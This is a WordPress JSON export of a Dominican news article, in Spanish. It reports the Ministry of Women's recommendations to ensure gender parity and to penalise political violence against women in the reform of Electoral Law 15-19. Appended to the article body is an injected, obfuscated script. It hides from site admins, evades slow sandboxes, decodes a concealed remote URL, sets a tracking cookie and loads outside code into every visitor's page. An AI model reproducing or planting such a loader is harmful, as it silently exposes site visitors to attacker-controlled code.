{"id":13112,"date":"2023-01-06T10:04:48","date_gmt":"2023-01-06T14:04:48","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13112"},"modified":"2023-01-06T10:04:48","modified_gmt":"2023-01-06T14:04:48","slug":"ministerio-de-la-mujer-presentara-recomendaciones-para-garantizar-paridad-de-genero-en-la-ley-del-regimen-electoral","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13112","title":{"rendered":"Ministerio de la Mujer presentar\u00e1 recomendaciones para garantizar paridad de g\u00e9nero en la Ley del R\u00e9gimen Electoral"},"content":{"rendered":"<p>Santo Domingo. &#8211;\u00a0<strong>El Ministerio de la Mujer<\/strong>\u00a0extern\u00f3 una\u00a0<strong>serie de recomendaciones<\/strong>\u00a0que presentar\u00e1 a una comisi\u00f3n especial de la\u00a0<strong>C\u00e1mara de Diputados<\/strong>, con el fin de que en la modificaci\u00f3n a la\u00a0<strong>Ley No. 15-19 del R\u00e9gimen Electoral<\/strong>\u00a0se asegure la\u00a0<strong>igualdad y la equidad de g\u00e9nero<\/strong>\u00a0contenidas en el\u00a0<strong>art\u00edculo 39<\/strong>, premisa fundamental para avanzar hacia un Estado democr\u00e1tico, social y de derecho.<\/p>\n<p><strong>La ministra de la Mujer, Mayra Jim\u00e9nez<\/strong>, se\u00f1al\u00f3 como imprescindible asegurar la paridad\u00a0<strong>en consonancia con la Constituci\u00f3n<\/strong>, la cual exige de los poderes del Estado promover y garantizar la\u00a0<strong>participaci\u00f3n equilibrada de mujeres y hombres en las candidaturas a los cargos de elecci\u00f3n popular<\/strong>\u00a0para las instancias de direcci\u00f3n y decisi\u00f3n en el \u00e1mbito p\u00fablico, en la administraci\u00f3n de justicia y en los organismos de control.<\/p>\n<p>Jim\u00e9nez manifest\u00f3 que el logro de la paridad en todos los puestos de elecci\u00f3n popular es\u00a0<strong>una de las metas contempladas en la Ley 1-12 de Estrategia Nacional de Desarrollo 2030<\/strong>\u00a0y es una herramienta para garantizar la plena participaci\u00f3n pol\u00edtica de las mujeres, tal como establece el\u00a0<strong>Plan Nacional de Igualdad y Equidad de G\u00e9nero (PLANEG III)<\/strong>\u00a0del Ministerio de la Mujer, adem\u00e1s de ser un compromiso de la actual gesti\u00f3n de Gobierno.<\/p>\n<p><em>\u201cLa paridad es fundamental para producir la transformaci\u00f3n cultural que rompa con las barreras estructurales que reproducen las desigualdades y privan a la sociedad del m\u00e1ximo aprovechamiento de las capacidades y aportes de las mujeres. As\u00ed mismo, es necesaria una legislaci\u00f3n electoral que contribuya a erradicar la discriminaci\u00f3n y la exclusi\u00f3n y que quienes compitan disfruten de las mismas oportunidades bajo condiciones de igualdad y equidad\u201d,<\/em>\u00a0agreg\u00f3.<\/p>\n<p>La Ministra Jim\u00e9nez enfatiz\u00f3 que al no contar con un dispositivo legal espec\u00edfico que defina y sancione la violencia pol\u00edtica,\u00a0<strong>las mujeres se enfrentan a distintos obst\u00e1culos para acceder a puestos de elecci\u00f3n popular en condiciones de igualdad.<\/strong><\/p>\n<p>Mayra Jim\u00e9nez detall\u00f3 que entre las m\u00faltiples barreras que limitan a las mujeres para competir en condiciones de equidad est\u00e1\u00a0<strong>el alto costo de las candidaturas<\/strong>, lo que las desalienta en el proceso electoral, para sostenerse en el proceso o repetir en siguientes contiendas.<\/p>\n<p><strong>Consideraciones del Ministerio de la Mujer para la C\u00e1mara de Diputados en relaci\u00f3n con la reforma a la Ley Org\u00e1nica del R\u00e9gimen Electoral:<\/strong><\/p>\n<p>Incluir un art\u00edculo espec\u00edfico sobre paridad de g\u00e9nero en el que se establezcan claramente\u00a0<strong>la forma y mecanismos de escogencia<\/strong>\u00a0de las y los candidatos a puestos de elecci\u00f3n popular, as\u00ed como la\u00a0<strong>permanencia y vacancia<\/strong>\u00a0de dichos puestos.<\/p>\n<p>Respetar en todo momento el principio de paridad de g\u00e9nero,\u00a0<strong>cincuenta por ciento (50 %) de mujeres y cincuenta por ciento (50 %) de hombres<\/strong>\u00a0en todas las demarcaciones y que se establezca\u00a0<strong>responsabilidad civil administrativa a la inobservancia de esta<\/strong>. La paridad deber\u00e1 ser aplicada de forma vertical y horizontal en la presentaci\u00f3n de candidaturas por parte de los partidos, agrupaciones y movimientos pol\u00edticos.<\/p>\n<p>Es importante reiterar lo que ya ha sido determinado por el Tribunal Constitucional y por el Tribunal Superior Electoral:\u00a0<strong>la aplicaci\u00f3n de la cuota de g\u00e9nero debe observarse en cada demarcaci\u00f3n electoral<\/strong>; no en la propuesta nacional de cada partido. Lo contrario constituir\u00eda una transgresi\u00f3n al principio de progresividad, al derecho a la participaci\u00f3n pol\u00edtica de las mujeres y al derecho a la igualdad y la equidad de g\u00e9nero.<\/p>\n<p>Incluir, definir y sancionar la\u00a0<strong>violencia pol\u00edtica contra las mujeres<\/strong>\u00a0dentro de las infracciones administrativas electorales, entendida como toda acci\u00f3n orientada a menoscabar o anular, de manera directa o indirecta, el reconocimiento, goce o ejercicio de los derechos pol\u00edticos y electorales de las mujeres mediante la realizaci\u00f3n o promoci\u00f3n de actos, conductas u omisiones que constituyan formas de violencia basada en g\u00e9nero.<\/p>\n<p>Incorporar dentro de la\u00a0<strong>propaganda prohibida<\/strong>\u00a0en la precampa\u00f1a y en la campa\u00f1a electoral la divulgaci\u00f3n o difusi\u00f3n de im\u00e1genes, mensajes o informaci\u00f3n, por cualquier medio f\u00edsico o virtual, que transmitan y\/o reproduzcan\u00a0<strong>estereotipos de g\u00e9nero basados en relaciones de dominaci\u00f3n, desigualdad y discriminaci\u00f3n contra las mujeres.<\/strong><\/p>\n<p><strong>Reducir los topes en los gastos de campa\u00f1a<\/strong>\u00a0y establecer mecanismos expl\u00edcitos de fiscalizaci\u00f3n de estos.<\/p>\n<p>Explicitar, adem\u00e1s, que la\u00a0<strong>inversi\u00f3n de los recursos del Estado<\/strong>\u00a0para apoyar candidaturas a puestos de elecci\u00f3n popular en todo el territorio nacional\u00a0<strong>deber\u00e1 distribuirse atendiendo a la paridad de g\u00e9nero.\u00a0\u00a0<\/strong><\/p>\n<p>Asegurar que en todo el texto de la modificaci\u00f3n de la Ley Org\u00e1nica del R\u00e9gimen Electoral\u00a0<strong>quede expl\u00edcito el enfoque de igualdad y equidad de g\u00e9nero.<\/strong><\/p>\n<p>En virtud de lo expuesto, el Ministerio de la Mujer solicitar\u00e1 una reuni\u00f3n a la comisi\u00f3n especial de la C\u00e1mara de Diputados responsable de la modificaci\u00f3n de la Ley Org\u00e1nica del R\u00e9gimen Electoral No. 15-19, a los fines de presentarle las recomendaciones.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo. &#8211;\u00a0El Ministerio de la Mujer\u00a0extern\u00f3 una\u00a0serie de recomendaciones\u00a0que presentar\u00e1 a una comisi\u00f3n especial de la\u00a0C\u00e1mara de Diputados, con el fin de que en la modificaci\u00f3n a la\u00a0Ley No. 15-19 del R\u00e9gimen Electoral\u00a0se asegure la\u00a0igualdad y la equidad de g\u00e9nero\u00a0contenidas en el\u00a0art\u00edculo 39, premisa fundamental para avanzar hacia un Estado democr\u00e1tico, social y de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13114,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13112","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13112","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13112"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13112\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13114"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13112"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13112"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13112"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}